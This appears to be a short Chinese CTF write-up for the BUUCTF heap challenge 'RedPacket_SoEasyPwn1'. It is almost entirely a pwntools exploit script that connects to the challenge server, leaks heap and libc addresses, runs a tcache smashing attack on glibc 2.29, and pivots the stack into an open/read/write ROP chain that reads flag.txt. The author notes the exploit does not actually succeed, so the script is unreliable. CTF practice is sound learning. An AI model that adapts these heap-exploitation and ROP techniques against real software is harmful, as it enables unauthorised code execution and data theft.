思路

这题很奇怪，感觉没问题，也绕过了，但就是打不通，不知道问题在哪

EXP

from pwn import *

#p = process("./RedPacket_SoEasyPwn1")
p = remote('node4.buuoj.cn',29013)
# context.log_level = 'debug'
elf = ELF("./RedPacket_SoEasyPwn1")
libc = ELF('./libc-2.29.so')

s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('Your input: ',choice)

def add(idx,size,content):
    cmd(1)
    sla('Please input the red packet idx: ',idx)
    sla('How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ',size)
    p.sendafter('Please input content: ',content)

def edit(idx,content):
    cmd(3)
    sla('Please input the red packet idx: ',idx)
    p.sendafter('Please input content: ',content)

def delete(idx):
    cmd(2)
    sla('Please input the red packet idx: ',idx)

def show(idx):
    cmd(4)
    sla('Please input the red packet idx: ',idx)

def dbg():
    gdb.attach(p)
    pause()

for i in range (0,6):
    add(i,2,'a')
    delete(i)
for i in range(0,8):
    add(i,4,'a')
add(8,1,'a')

for i in range(0,8):
    delete(i)

show(6)
heap_head = u64(p.recv(6).ljust(8,'\x00')) - 0x26c0 -0x600
lg('heap_head',heap_head)

show(7)
libc_base = uu64() - 96 - 0x1E4C40
lg('libc_base',libc_base)

read_addr = libc.sym['read'] + libc_base
open_addr = libc.sym['open'] + libc_base
write_addr = libc.sym['write'] + libc_base

#tcache smash
# make background
#chunk1
add(3,3,'a')
#chunk2
add(1,4,'a')
add(2,4,'a')
delete(1)
add(4,3,'a')
add(5,3,'a')
#attack
edit(1,'a'*0x300 + p64(0) + p64(0x101) + p64(heap_head + 0x37e0) + p64(heap_head + 0x250 + 0x10 + 0x800 - 0x10))
add(6,2,'a')

pop_rdi_ret = 0x0000000000026542 + libc_base
pop_rsi_ret = 0x0000000000026f9e + libc_base
pop_rdx_ret = 0x000000000012bda6 + libc_base
leave_ret   = 0x0000000000058373 + libc_base

shell  = p64(pop_rdi_ret) + p64(heap_head + 0x004440) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret)+ p64(0)
shell += p64(open_addr)
shell += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(read_addr)
shell += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(write_addr)
add(7,4,"flag.txt")
add(8,4,shell)
cmd(666)
pl = 'a'*0x80 + p64(heap_head + 0x004840 + 8)+ p64(leave_ret)
p.recvuntil('What do you want to say?')
p.send(pl)
p.interactive()